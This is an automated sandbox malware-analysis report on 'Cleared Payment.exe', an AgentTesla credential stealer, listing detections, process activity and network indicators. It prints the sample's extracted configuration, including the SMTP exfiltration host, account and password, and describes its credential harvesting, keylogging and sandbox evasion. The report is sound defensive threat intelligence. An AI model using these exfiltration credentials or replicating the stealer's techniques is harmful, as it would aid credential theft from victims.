Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cleared Payment.exe

Overview

General Information

Sample name:Cleared Payment.exe
Analysis ID:1427197
MD5:0df9817e2867f94e6bf0c066f9d88013
SHA1:9b45f5c8cf5402b8cd56b58df316ca84b633f5c2
SHA256:ff70339ef950407a12f181c63d5b3d59fe40198237d97ce3c6537403c7863624
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Cleared Payment.exe (PID: 5140 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
    • Cleared Payment.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
    • Cleared Payment.exe (PID: 2548 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1               "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Cleared Payment.exe.41d12a0.12.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Cleared Payment.exe.41d12a0.12.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Cleared Payment.exe.41d12a0.12.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3355b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33677:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33753:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x33879:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  4.2.Cleared Payment.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    4.2.Cleared Payment.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 11 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Cleared Payment.exe, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714

                      Snort Signatures

                      Timestamp:04/17/24-08:35:59.697606
                      SID:2030171
                      Source Port:49714
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Cleared Payment.exeAvira: detected
                      Found malware configuration
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1 "}
                      Multi AV Scanner detection for submitted file
                      Source: Cleared Payment.exeReversingLabs: Detection: 73%
                      Source: Cleared Payment.exeVirustotal: Detection: 61%Perma Link
                      Source: Cleared Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: Cleared Payment.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49714 -> 208.91.199.223:587
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 208.91.199.223:587
                      Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 208.91.199.223:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.ipify.org
                      Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.italiacanda-it.com
                      Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, K6raBsUk6.cs.Net Code: _1kx

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 0.2.Cleared Payment.exe.25aad94.1.raw.unpack, SQL.csLarge array initialization: : array initializer size 13797
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Cleared Payment.exe
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_025376F80_2_025376F8
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_025377080_2_02537708
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_04B602880_2_04B60288
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_086093400_2_08609340
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_08600E480_2_08600E48
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_0860DDA80_2_0860DDA8
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_0860DD970_2_0860DD97
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_08600E380_2_08600E38
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BCE5C14_2_02BCE5C1
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BC4A984_2_02BC4A98
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BC3E804_2_02BC3E80
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BC41C84_2_02BC41C8
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BCA9604_2_02BCA960
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAA1784_2_06BAA178
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BABA004_2_06BABA00
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB55A84_2_06BB55A8
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB65E84_2_06BB65E8
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BBB2204_2_06BBB220
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB30604_2_06BB3060
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BBC1704_2_06BBC170
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB7D784_2_06BB7D78
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB76984_2_06BB7698
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BBE3884_2_06BBE388
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB00404_2_06BB0040
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB5CDB4_2_06BB5CDB
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB02F74_2_06BB02F7
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BB00064_2_06BB0006
                      Source: Cleared Payment.exeBinary or memory string: OriginalFilename vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000000.2072850317.00000000002D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBoed.exe" vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2115085460.0000000008930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2113867283.0000000006BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002627000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000000.00000002.2106490417.00000000008FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000004.00000002.3324069341.0000000000F58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Cleared Payment.exe
                      Source: Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
                      Source: Cleared Payment.exeBinary or memory string: OriginalFilenameBoed.exe" vs Cleared Payment.exe
                      Source: Cleared Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Cleared Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, sc771bRe0eO1bpWvGt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, sc771bRe0eO1bpWvGt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, sc771bRe0eO1bpWvGt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@2/2
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cleared Payment.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMutant created: \Sessions\1\BaseNamedObjects\XtwtjCiO
                      Source: Cleared Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Cleared Payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Cleared Payment.exeReversingLabs: Detection: 73%
                      Source: Cleared Payment.exeVirustotal: Detection: 61%
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile read: C:\Users\user\Desktop\Cleared Payment.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: sspicli.dllJump to behavior
